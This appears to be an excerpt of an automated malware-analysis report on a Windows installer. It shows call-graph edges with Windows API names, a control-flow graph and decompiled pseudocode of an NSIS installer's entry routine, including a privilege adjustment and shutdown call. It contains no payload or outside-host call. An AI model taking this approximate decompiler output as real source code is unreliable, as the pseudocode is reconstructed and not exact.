3926->3908 3926->3910 3926->3911 3926->3912 3926->3920 3926->3923 3929 405cc8 MessageBoxIndirectW 3926->3929 3933 406158 GetFileAttributesW CreateFileW 3926->3933 3930 4018ee lstrcatW 3927->3930 3931 401901 3928->3931 3929->3926 3930->3931 3932 405cc8 MessageBoxIndirectW 3931->3932 3932->3922 3933->3926 3934->3902 3935->3903 4188 401a72 4189 402d84 17 API calls 4188->4189 4190 401a7b 4189->4190 4191 402d84 17 API calls 4190->4191 4192 401a20 4191->4192 4193 401573 4194 401583 ShowWindow 4193->4194 4195 40158c 4193->4195 4194->4195 4196 402c2a 4195->4196 4197 40159a ShowWindow 4195->4197 4197->4196 4198 4023f4 4199 402da6 17 API calls 4198->4199 4200 402403 4199->4200 4201 402da6 17 API calls 4200->4201 4202 40240c 4201->4202 4203 402da6 17 API calls 4202->4203 4204 402416 GetPrivateProfileStringW 4203->4204 4205 4014f5 SetForegroundWindow 4206 402c2a 4205->4206 4207 401ff6 4208 402da6 17 API calls 4207->4208 4209 401ffd 4208->4209 4210 40699e 2 API calls 4209->4210 4211 402003 4210->4211 4213 402014 4211->4213 4214 4065af wsprintfW 4211->4214 4214->4213 4215 401b77 4216 402da6 17 API calls 4215->4216 4217 401b7e 4216->4217 4218 402d84 17 API calls 4217->4218 4219 401b87 wsprintfW 4218->4219 4220 402c2a 4219->4220 4221 4046fa lstrcpynW lstrlenW 4222 40167b 4223 402da6 17 API calls 4222->4223 4224 401682 4223->4224 4225 402da6 17 API calls 4224->4225 4226 40168b 4225->4226 4227 402da6 17 API calls 4226->4227 4228 401694 MoveFileW 4227->4228 4229 4016a0 4228->4229 4230 4016a7 4228->4230 4232 401423 24 API calls 4229->4232 4231 40699e 2 API calls 4230->4231 4234 4022f6 4230->4234 4233 4016b6 4231->4233 4232->4234 4233->4234 4235 406428 36 API calls 4233->4235 4235->4229 4243 4019ff 4244 402da6 17 API calls 4243->4244 4245 401a06 4244->4245 4246 402da6 17 API calls 4245->4246 4247 401a0f 4246->4247 4248 401a16 lstrcmpiW 4247->4248 4249 401a28 lstrcmpW 4247->4249 4250 401a1c 4248->4250 4249->4250 4251 4022ff 4252 402da6 17 API calls 4251->4252 4253 402305 4252->4253 4254 402da6 17 API calls 4253->4254 4255 40230e 4254->4255 4256 402da6 17 API calls 4255->4256 4257 402317 4256->4257 4258 40699e 2 API calls 4257->4258 4259 402320 4258->4259 4260 402331 lstrlenW lstrlenW 4259->4260 4261 402324 4259->4261 4263 4056ca 24 API calls 4260->4263 4262 4056ca 24 API calls 4261->4262 4265 40232c 4261->4265 4262->4265 4264 40236f SHFileOperationW 4263->4264 4264->4261 4264->4265 4266 401000 4267 401037 BeginPaint GetClientRect 4266->4267 4268 40100c DefWindowProcW 4266->4268 4270 4010f3 4267->4270 4271 401179 4268->4271 4272 401073 CreateBrushIndirect FillRect DeleteObject 4270->4272 4273 4010fc 4270->4273 4272->4270 4274 401102 CreateFontIndirectW 4273->4274 4275 401167 EndPaint 4273->4275 4274->4275 4276 401112 6 API calls 4274->4276 4275->4271 4276->4275 4277 401d81 4278 401d94 GetDlgItem 4277->4278 4279 401d87 4277->4279 4281 401d8e 4278->4281 4280 402d84 17 API calls 4279->4280 4280->4281 4282 401dd5 GetClientRect LoadImageW SendMessageW 4281->4282 4284 402da6 17 API calls 4281->4284 4285 401e33 4282->4285 4287 401e3f 4282->4287 4284->4282 4286 401e38 DeleteObject 4285->4286 4285->4287 4286->4287 4288 401503 4289 40150b 4288->4289 4291 40151e 4288->4291 4290 402d84 17 API calls 4289->4290 4290->4291 4292 404783 4293 40479b 4292->4293 4297 4048b5 4292->4297 4298 4045c4 18 API calls 4293->4298 4294 40491f 4295 4049e9 4294->4295 4296 404929 GetDlgItem 4294->4296 4303 40462b 8 API calls 4295->4303 4299 404943 4296->4299 4300 4049aa 4296->4300 4297->4294 4297->4295 4301 4048f0 GetDlgItem SendMessageW 4297->4301 4302 404802 4298->4302 4299->4300 4308 404969 SendMessageW LoadCursorW SetCursor 4299->4308 4300->4295 4304 4049bc 4300->4304 4325 4045e6 EnableWindow 4301->4325 4306 4045c4 18 API calls 4302->4306 4307 4049e4 4303->4307 4309 4049d2 4304->4309 4310 4049c2 SendMessageW 4304->4310 4312 40480f CheckDlgButton 4306->4312 4329 404a32 4308->4329 4309->4307 4315 4049d8 SendMessageW 4309->4315 4310->4309 4311 40491a 4326 404a0e 4311->4326 4323 4045e6 EnableWindow 4312->4323 4315->4307 4318 40482d GetDlgItem 4324 4045f9 SendMessageW 4318->4324 4320 404843 SendMessageW 4321 404860 GetSysColor 4320->4321 4322 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4320->4322 4321->4322 4322->4307 4323->4318 4324->4320 4325->4311 4327 404a21 SendMessageW 4326->4327 4328 404a1c 4326->4328 4327->4294 4328->4327 4332 405c8e ShellExecuteExW 4329->4332 4331 404998 LoadCursorW SetCursor 4331->4300 4332->4331 4333 402383 4334 40238a 4333->4334 4337 40239d 4333->4337 4335 4066a5 17 API calls 4334->4335 4336 402397 4335->4336 4338 405cc8 MessageBoxIndirectW 4336->4338 4338->4337 4339 402c05 SendMessageW 4340 402c2a 4339->4340 4341 402c1f InvalidateRect 4339->4341 4341->4340 4342 405809 4343 4059b3 4342->4343 4344 40582a GetDlgItem GetDlgItem GetDlgItem 4342->4344 4346 4059e4 4343->4346 4347 4059bc GetDlgItem CreateThread CloseHandle 4343->4347 4387 4045f9 SendMessageW 4344->4387 4349 405a0f 4346->4349 4350 405a34 4346->4350 4351 4059fb ShowWindow ShowWindow 4346->4351 4347->4346 4348 40589a 4353 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4348->4353 4352 405a6f 4349->4352 4355 405a23 4349->4355 4356 405a49 ShowWindow 4349->4356 4357 40462b 8 API calls 4350->4357 4389 4045f9 SendMessageW 4351->4389 4352->4350 4362 405a7d SendMessageW 4352->4362 4360 4058f3 SendMessageW SendMessageW 4353->4360 4361 40590f 4353->4361 4363 40459d SendMessageW 4355->4363 4358 405a69 4356->4358 4359 405a5b 4356->4359 4368 405a42 4357->4368 4365 40459d SendMessageW 4358->4365 4364 4056ca 24 API calls 4359->4364 4360->4361 4366 405922 4361->4366 4367 405914 SendMessageW 4361->4367 4362->4368 4369 405a96 CreatePopupMenu 4362->4369 4363->4350 4364->4358 4365->4352 4371 4045c4 18 API calls 4366->4371 4367->4366 4370 4066a5 17 API calls 4369->4370 4372 405aa6 AppendMenuW 4370->4372 4373 405932 4371->4373 4374 405ac3 GetWindowRect 4372->4374 4375 405ad6 TrackPopupMenu 4372->4375 4376 40593b ShowWindow 4373->4376 4377 40596f GetDlgItem SendMessageW 4373->4377 4374->4375 4375->4368 4379 405af1 4375->4379 4380 405951 ShowWindow 4376->4380 4381 40595e 4376->4381 4377->4368 4378 405996 SendMessageW SendMessageW 4377->4378 4378->4368 4382 405b0d SendMessageW 4379->4382 4380->4381 4388 4045f9 SendMessageW 4381->4388 4382->4382 4383 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4382->4383 4385 405b4f SendMessageW 4383->4385 4385->4385 4386 405b78 GlobalUnlock SetClipboardData CloseClipboard 4385->4386 4386->4368 4387->4348 4388->4377 4389->4349 4390 40248a 4391 402da6 17 API calls 4390->4391 4392 40249c 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4024a6 4393->4394 4407 402e36 4394->4407 4397 40292e 4398 4024de 4400 4024ea 4398->4400 4403 402d84 17 API calls 4398->4403 4399 402da6 17 API calls 4402 4024d4 lstrlenW 4399->4402 4401 402509 RegSetValueExW 4400->4401 4404 403371 44 API calls 4400->4404 4405 40251f RegCloseKey 4401->4405 4402->4398 4403->4400 4404->4401 4405->4397 4408 402e51 4407->4408 4411 406503 4408->4411 4412 406512 4411->4412 4413 4024b6 4412->4413 4414 40651d RegCreateKeyExW 4412->4414 4413->4397 4413->4398 4413->4399 4414->4413 4415 404e0b 4416 404e37 4415->4416 4417 404e1b 4415->4417 4419 404e6a 4416->4419 4420 404e3d SHGetPathFromIDListW 4416->4420 4426 405cac GetDlgItemTextW 4417->4426 4421 404e54 SendMessageW 4420->4421 4422 404e4d 4420->4422 4421->4419 4424 40140b 2 API calls 4422->4424 4423 404e28 SendMessageW 4423->4416 4424->4421 4426->4423 4427 40290b 4428 402da6 17 API calls 4427->4428 4429 402912 FindFirstFileW 4428->4429 4430 40293a 4429->4430 4434 402925 4429->4434 4435 4065af wsprintfW 4430->4435 4432 402943 4436 406668 lstrcpynW 4432->4436 4435->4432 4436->4434 4437 40190c 4438 401943 4437->4438 4439 402da6 17 API calls 4438->4439 4440 401948 4439->4440 4441 405d74 67 API calls 4440->4441 4442 401951 4441->4442 4443 40190f 4444 402da6 17 API calls 4443->4444 4445 401916 4444->4445 4446 405cc8 MessageBoxIndirectW 4445->4446 4447 40191f 4446->4447 4448 401491 4449 4056ca 24 API calls 4448->4449 4450 401498 4449->4450 4451 402891 4452 402898 4451->4452 4453 402ba9 4451->4453 4454 402d84 17 API calls 4452->4454 4455 40289f 4454->4455 4456 4028ae SetFilePointer 4455->4456 4456->4453 4457 4028be 4456->4457 4459 4065af wsprintfW 4457->4459 4459->4453 4460 401f12 4461 402da6 17 API calls 4460->4461 4462 401f18 4461->4462 4463 402da6 17 API calls 4462->4463 4464 401f21 4463->4464 4465 402da6 17 API calls 4464->4465 4466 401f2a 4465->4466 4467 402da6 17 API calls 4466->4467 4468 401f33 4467->4468 4469 401423 24 API calls 4468->4469 4470 401f3a 4469->4470 4477 405c8e ShellExecuteExW 4470->4477 4472 401f82 4473 406ae0 5 API calls 4472->4473 4475 40292e 4472->4475 4474 401f9f CloseHandle 4473->4474 4474->4475 4477->4472 4478 402f93 4479 402fa5 SetTimer 4478->4479 4480 402fbe 4478->4480 4479->4480 4481 40300c 4480->4481 4482 403012 MulDiv 4480->4482 4483 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4482->4483 4483->4481 4499 401d17 4500 402d84 17 API calls 4499->4500 4501 401d1d IsWindow 4500->4501 4502 401a20 4501->4502 4503 401b9b 4504 401ba8 4503->4504 4505 401bec 4503->4505 4512 401bbf 4504->4512 4514 401c31 4504->4514 4506 401bf1 4505->4506 4507 401c16 GlobalAlloc 4505->4507 4511 40239d 4506->4511 4524 406668 lstrcpynW 4506->4524 4509 4066a5 17 API calls 4507->4509 4508 4066a5 17 API calls 4510 402397 4508->4510 4509->4514 4518 405cc8 MessageBoxIndirectW 4510->4518 4522 406668 lstrcpynW 4512->4522 4514->4508 4514->4511 4516 401c03 GlobalFree 4516->4511 4517 401bce 4523 406668 lstrcpynW 4517->4523 4518->4511 4520 401bdd 4525 406668 lstrcpynW 4520->4525 4522->4517 4523->4520 4524->4516 4525->4511 4526 40261c 4527 402da6 17 API calls 4526->4527 4528 402623 4527->4528 4531 406158 GetFileAttributesW CreateFileW 4528->4531 4530 40262f 4531->4530 4539 40149e 4540 4014ac PostQuitMessage 4539->4540 4541 40239d 4539->4541 4540->4541 4542 40259e 4552 402de6 4542->4552 4545 402d84 17 API calls 4546 4025b1 4545->4546 4547 4025d9 RegEnumValueW 4546->4547 4548 4025cd RegEnumKeyW 4546->4548 4550 40292e 4546->4550 4549 4025ee RegCloseKey 4547->4549 4548->4549 4549->4550 4553 402da6 17 API calls 4552->4553 4554 402dfd 4553->4554 4555 4064d5 RegOpenKeyExW 4554->4555 4556 4025a8 4555->4556 4556->4545 4557 4015a3 4558 402da6 17 API calls 4557->4558 4559 4015aa SetFileAttributesW 4558->4559 4560 4015bc 4559->4560 3756 401fa4 3757 402da6 17 API calls 3756->3757 3758 401faa 3757->3758 3759 4056ca 24 API calls 3758->3759 3760 401fb4 3759->3760 3761 405c4b 2 API calls 3760->3761 3762 401fba 3761->3762 3763 401fdd CloseHandle 3762->3763 3767 40292e 3762->3767 3771 406ae0 WaitForSingleObject 3762->3771 3763->3767 3766 401fcf 3768 401fd4 3766->3768 3769 401fdf 3766->3769 3776 4065af wsprintfW 3768->3776 3769->3763 3772 406afa 3771->3772 3773 406b0c GetExitCodeProcess 3772->3773 3774 406a71 2 API calls 3772->3774 3773->3766 3775 406b01 WaitForSingleObject 3774->3775 3775->3772 3776->3763 3876 403c25 3877 403c40 3876->3877 3878 403c36 CloseHandle 3876->3878 3879 403c54 3877->3879 3880 403c4a CloseHandle 3877->3880 3878->3877 3885 403c82 3879->3885 3880->3879 3883 405d74 67 API calls 3884 403c65 3883->3884 3886 403c90 3885->3886 3887 403c59 3886->3887 3888 403c95 FreeLibrary GlobalFree 3886->3888 3887->3883 3888->3887 3888->3888 4561 40202a 4562 402da6 17 API calls 4561->4562 4563 402031 4562->4563 4564 406a35 5 API calls 4563->4564 4565 402040 4564->4565 4566 40205c GlobalAlloc 4565->4566 4567 4020cc 4565->4567 4566->4567 4568 402070 4566->4568 4569 406a35 5 API calls 4568->4569 4570 402077 4569->4570 4571 406a35 5 API calls 4570->4571 4572 402081 4571->4572 4572->4567 4576 4065af wsprintfW 4572->4576 4574 4020ba 4577 4065af wsprintfW 4574->4577 4576->4574 4577->4567 4578 40252a 4579 402de6 17 API calls 4578->4579 4580 402534 4579->4580 4581 402da6 17 API calls 4580->4581 4582 40253d 4581->4582 4583 402548 RegQueryValueExW 4582->4583 4586 40292e 4582->4586 4584 40256e RegCloseKey 4583->4584 4585 402568 4583->4585 4584->4586 4585->4584 4589 4065af wsprintfW 4585->4589 4589->4584 4590 4021aa 4591 402da6 17 API calls 4590->4591 4592 4021b1 4591->4592 4593 402da6 17 API calls 4592->4593 4594 4021bb 4593->4594 4595 402da6 17 API calls 4594->4595 4596 4021c5 4595->4596 4597 402da6 17 API calls 4596->4597 4598 4021cf 4597->4598 4599 402da6 17 API calls 4598->4599 4600 4021d9 4599->4600 4601 402218 CoCreateInstance 4600->4601 4602 402da6 17 API calls 4600->4602 4605 402237 4601->4605 4602->4601 4603 401423 24 API calls 4604 4022f6 4603->4604 4605->4603 4605->4604 4613 401a30 4614 402da6 17 API calls 4613->4614 4615 401a39 ExpandEnvironmentStringsW 4614->4615 4616 401a60 4615->4616 4617 401a4d 4615->4617 4617->4616 4618 401a52 lstrcmpW 4617->4618 4618->4616 4619 405031 GetDlgItem GetDlgItem 4620 405083 7 API calls 4619->4620 4621 4052a8 4619->4621 4622 40512a DeleteObject 4620->4622 4623 40511d SendMessageW 4620->4623 4626 40538a 4621->4626 4653 405317 4621->4653 4673 404f7f SendMessageW 4621->4673 4624 405133 4622->4624 4623->4622 4625 40516a 4624->4625 4629 4066a5 17 API calls 4624->4629 4627 4045c4 18 API calls 4625->4627 4628 405436 4626->4628 4632 40529b 4626->4632 4638 4053e3 SendMessageW 4626->4638 4631 40517e 4627->4631 4633 405440 SendMessageW 4628->4633 4634 405448 4628->4634 4630 40514c SendMessageW SendMessageW 4629->4630 4630->4624 4637 4045c4 18 API calls 4631->4637 4635 40462b 8 API calls 4632->4635 4633->4634 4641 405461 4634->4641 4642 40545a ImageList_Destroy 4634->4642 4649 405471 4634->4649 4640 405637 4635->4640 4654 40518f 4637->4654 4638->4632 4644 4053f8 SendMessageW 4638->4644 4639 40537c SendMessageW 4639->4626 4645 40546a GlobalFree 4641->4645 4641->4649 4642->4641 4643 4055eb 4643->4632 4650 4055fd ShowWindow GetDlgItem ShowWindow 4643->4650 4647 40540b 4644->4647 4645->4649 4646 40526a GetWindowLongW SetWindowLongW 4648 405283 4646->4648 4658 40541c SendMessageW 4647->4658 4651 4052a0 4648->4651 4652 405288 ShowWindow 4648->4652 4649->4643 4666 4054ac 4649->4666 4678 404fff 4649->4678 4650->4632 4672 4045f9 SendMessageW 4651->4672 4671 4045f9 SendMessageW 4652->4671 4653->4626 4653->4639 4654->4646 4657 4051e2 SendMessageW 4654->4657 4659 405265 4654->4659 4660 405220 SendMessageW 4654->4660 4661 405234 SendMessageW 4654->4661 4657->4654 4658->4628 4659->4646 4659->4648 4660->4654 4661->4654 4663 4055b6 4664 4055c1 InvalidateRect 4663->4664 4667 4055cd 4663->4667 4664->4667 4665 4054da SendMessageW 4669 4054f0 4665->4669 4666->4665 4666->4669 4667->4643 4687 404f3a 4667->4687 4668 405564 SendMessageW SendMessageW 4668->4669 4669->4663 4669->4668 4671->4632 4672->4621 4674 404fa2 GetMessagePos ScreenToClient SendMessageW 4673->4674 4675 404fde SendMessageW 4673->4675 4676 404fd6 4674->4676 4677 404fdb 4674->4677 4675->4676 4676->4653 4677->4675 4690 406668 lstrcpynW 4678->4690 4680 405012 4691 4065af wsprintfW 4680->4691 4682 40501c 4683 40140b 2 API calls 4682->4683 4684 405025 4683->4684 4692 406668 lstrcpynW 4684->4692 4686 40502c 4686->4666 4693 404e71 4687->4693 4689 404f4f 4689->4643 4690->4680 4691->4682 4692->4686 4694 404e8a 4693->4694 4695 4066a5 17 API calls 4694->4695 4696 404eee 4695->4696 4697 4066a5 17 API calls 4696->4697 4698 404ef9 4697->4698 4699 4066a5 17 API calls 4698->4699 4700 404f0f lstrlenW wsprintfW SetDlgItemTextW 4699->4700 4700->4689 4706 4023b2 4707 4023ba 4706->4707 4710 4023c0 4706->4710 4708 402da6 17 API calls 4707->4708 4708->4710 4709 4023ce 4712 4023dc 4709->4712 4713 402da6 17 API calls 4709->4713 4710->4709 4711 402da6 17 API calls 4710->4711 4711->4709 4714 402da6 17 API calls 4712->4714 4713->4712 4715 4023e5 WritePrivateProfileStringW 4714->4715 4716 404734 lstrlenW 4717 404753 4716->4717 4718 404755 WideCharToMultiByte 4716->4718 4717->4718 4719 402434 4720 402467 4719->4720 4721 40243c 4719->4721 4723 402da6 17 API calls 4720->4723 4722 402de6 17 API calls 4721->4722 4724 402443 4722->4724 4725 40246e 4723->4725 4727 402da6 17 API calls 4724->4727 4729 40247b 4724->4729 4730 402e64 4725->4730 4728 402454 RegDeleteValueW RegCloseKey 4727->4728 4728->4729 4731 402e78 4730->4731 4733 402e71 4730->4733 4731->4733 4734 402ea9 4731->4734 4733->4729 4735 4064d5 RegOpenKeyExW 4734->4735 4736 402ed7 4735->4736 4737 402ee7 RegEnumValueW 4736->4737 4744 402f81 4736->4744 4746 402f0a 4736->4746 4738 402f71 RegCloseKey 4737->4738 4737->4746 4738->4744 4739 402f46 RegEnumKeyW 4740 402f4f RegCloseKey 4739->4740 4739->4746 4741 406a35 5 API calls 4740->4741 4742 402f5f 4741->4742 4742->4744 4745 402f63 RegDeleteKeyW 4742->4745 4743 402ea9 6 API calls 4743->4746 4744->4733 4745->4744 4746->4738 4746->4739 4746->4740 4746->4743 4747 401735 4748 402da6 17 API calls 4747->4748 4749 40173c SearchPathW 4748->4749 4750 401757 4749->4750 4751 404ab5 4752 404ae1 4751->4752 4753 404af2 4751->4753 4812 405cac GetDlgItemTextW 4752->4812 4755 404afe GetDlgItem 4753->4755 4760 404b5d 4753->4760 4758 404b12 4755->4758 4756 404c41 4761 404df0 4756->4761 4814 405cac GetDlgItemTextW 4756->4814 4757 404aec 4759 4068ef 5 API calls 4757->4759 4763 404b26 SetWindowTextW 4758->4763 4764 405fe2 4 API calls 4758->4764 4759->4753 4760->4756 4760->4761 4765 4066a5 17 API calls 4760->4765 4768 40462b 8 API calls 4761->4768 4767 4045c4 18 API calls 4763->4767 4769 404b1c 4764->4769 4770 404bd1 SHBrowseForFolderW 4765->4770 4766 404c71 4771 40603f 18 API calls 4766->4771 4772 404b42 4767->4772 4773 404e04 4768->4773 4769->4763 4777 405f37 3 API calls 4769->4777 4770->4756 4774 404be9 CoTaskMemFree 4770->4774 4775 404c77 4771->4775 4776 4045c4 18 API calls 4772->4776 4778 405f37 3 API calls 4774->4778 4815 406668 lstrcpynW 4775->4815 4779 404b50 4776->4779 4777->4763 4780 404bf6 4778->4780 4813 4045f9 SendMessageW 4779->4813 4783 404c2d SetDlgItemTextW 4780->4783 4788 4066a5 17 API calls 4780->4788 4783->4756 4784 404b56 4786 406a35 5 API calls 4784->4786 4785 404c8e 4787 406a35 5 API calls 4785->4787 4786->4760 4794 404c95 4787->4794 4789 404c15 lstrcmpiW 4788->4789 4789->4783 4792 404c26 lstrcatW 4789->4792 4790 404cd6 4816 406668 lstrcpynW 4790->4816 4792->4783 4793 404cdd 4795 405fe2 4 API calls 4793->4795 4794->4790 4798 405f83 2 API calls 4794->4798 4800 404d2e 4794->4800 4796 404ce3 GetDiskFreeSpaceW 4795->4796 4799 404d07 MulDiv 4796->4799 4796->4800 4798->4794 4799->4800 4802 404f3a 20 API calls 4800->4802 4810 404d9f 4800->4810 4801 404dc2 4817 4045e6 EnableWindow 4801->4817 4804 404d8c 4802->4804 4803 40140b 2 API calls 4803->4801 4806 404da1 SetDlgItemTextW 4804->4806 4807 404d91 4804->4807 4806->4810 4808 404e71 20 API calls 4807->4808 4808->4810 4809 404dde 4809->4761 4811 404a0e SendMessageW 4809->4811 4810->4801 4810->4803 4811->4761 4812->4757 4813->4784 4814->4766 4815->4785 4816->4793 4817->4809 4818 401d38 4819 402d84 17 API calls 4818->4819 4820 401d3f 4819->4820 4821 402d84 17 API calls 4820->4821 4822 401d4b GetDlgItem 4821->4822 4823 402638 4822->4823 4824 4014b8 4825 4014be 4824->4825 4826 401389 2 API calls 4825->4826 4827 4014c6 4826->4827 4828 40563e 4829 405662 4828->4829 4830 40564e 4828->4830 4833 40566a IsWindowVisible 4829->4833 4839 405681 4829->4839 4831 405654 4830->4831 4832 4056ab 4830->4832 4835 404610 SendMessageW 4831->4835 4834 4056b0 CallWindowProcW 4832->4834 4833->4832 4836 405677 4833->4836 4837 40565e 4834->4837 4835->4837 4838 404f7f 5 API calls 4836->4838 4838->4839 4839->4834 4840 404fff 4 API calls 4839->4840 4840->4832 4841 40263e 4842 402652 4841->4842 4843 40266d 4841->4843 4844 402d84 17 API calls 4842->4844 4845 402672 4843->4845 4846 40269d 4843->4846 4855 402659 4844->4855 4848 402da6 17 API calls 4845->4848 4847 402da6 17 API calls 4846->4847 4850 4026a4 lstrlenW 4847->4850 4849 402679 4848->4849 4858 40668a WideCharToMultiByte 4849->4858 4850->4855 4852 40268d lstrlenA 4852->4855 4853 4026e7 4854 4026d1 4854->4853 4856 40620a WriteFile 4854->4856 4855->4853 4855->4854 4857 406239 5 API calls 4855->4857 4856->4853 4857->4854 4858->4852

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                    C-Code - Quality: 78%
                                                                                    			_entry_() {
                                                                                    				WCHAR* _v8;
                                                                                    				signed int _v12;
                                                                                    				void* _v16;
                                                                                    				signed int _v20;
                                                                                    				int _v24;
                                                                                    				int _v28;
                                                                                    				struct _TOKEN_PRIVILEGES _v40;
                                                                                    				signed char _v42;
                                                                                    				int _v44;
                                                                                    				signed int _v48;
                                                                                    				intOrPtr _v278;
                                                                                    				signed short _v310;
                                                                                    				struct _OSVERSIONINFOW _v324;
                                                                                    				struct _SHFILEINFOW _v1016;
                                                                                    				intOrPtr* _t88;
                                                                                    				WCHAR* _t92;
                                                                                    				char* _t94;
                                                                                    				void _t97;
                                                                                    				void* _t116;
                                                                                    				WCHAR* _t118;
                                                                                    				signed int _t119;
                                                                                    				intOrPtr* _t123;
                                                                                    				void* _t137;
                                                                                    				void* _t143;
                                                                                    				void* _t148;
                                                                                    				void* _t152;
                                                                                    				void* _t157;
                                                                                    				signed int _t167;
                                                                                    				void* _t170;
                                                                                    				void* _t175;
                                                                                    				intOrPtr _t177;
                                                                                    				intOrPtr _t178;
                                                                                    				intOrPtr* _t179;
                                                                                    				int _t188;
                                                                                    				void* _t189;
                                                                                    				void* _t198;
                                                                                    				signed int _t204;
                                                                                    				signed int _t209;
                                                                                    				signed int _t214;
                                                                                    				signed int _t216;
                                                                                    				int* _t218;
                                                                                    				signed int _t226;
                                                                                    				signed int _t229;
                                                                                    				CHAR* _t231;
                                                                                    				char* _t232;
                                                                                    				signed int _t233;
                                                                                    				WCHAR* _t234;
                                                                                    				void* _t250;
                                                                                    
                                                                                    				_t216 = 0x20;
                                                                                    				_t188 = 0;
                                                                                    				_v24 = 0;
                                                                                    				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                    				_v20 = 0;
                                                                                    				SetErrorMode(0x8001); // executed
                                                                                    				_v324.szCSDVersion = 0;
                                                                                    				_v48 = 0;
                                                                                    				_v44 = 0;
                                                                                    				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                    				if(GetVersionExW( &_v324) == 0) {
                                                                                    					_v324.dwOSVersionInfoSize = 0x114;
                                                                                    					GetVersionExW( &_v324);
                                                                                    					asm("sbb eax, eax");
                                                                                    					_v42 = 4;
                                                                                    					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                    				}
                                                                                    				if(_v324.dwMajorVersion < 0xa) {
                                                                                    					_v310 = _v310 & 0x00000000;
                                                                                    				}
                                                                                    				 *0x42a318 = _v324.dwBuildNumber;
                                                                                    				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                    				if( *0x42a31e != 0x600) {
                                                                                    					_t179 = E00406A35(_t188);
                                                                                    					if(_t179 != _t188) {
                                                                                    						 *_t179(0xc00);
                                                                                    					}
                                                                                    				}
                                                                                    				_t231 = "UXTHEME";
                                                                                    				do {
                                                                                    					E004069C5(_t231); // executed
                                                                                    					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                                                    				} while ( *_t231 != 0);
                                                                                    				E00406A35(0xb);
                                                                                    				 *0x42a264 = E00406A35(9);
                                                                                    				_t88 = E00406A35(7);
                                                                                    				if(_t88 != _t188) {
                                                                                    					_t88 =  *_t88(0x1e);
                                                                                    					if(_t88 != 0) {
                                                                                    						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                                                    					}
                                                                                    				}
                                                                                    				__imp__#17();
                                                                                    				__imp__OleInitialize(_t188); // executed
                                                                                    				 *0x42a320 = _t88;
                                                                                    				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                                                    				E00406668(0x429260, L"NSIS Error");
                                                                                    				_t92 = GetCommandLineW();
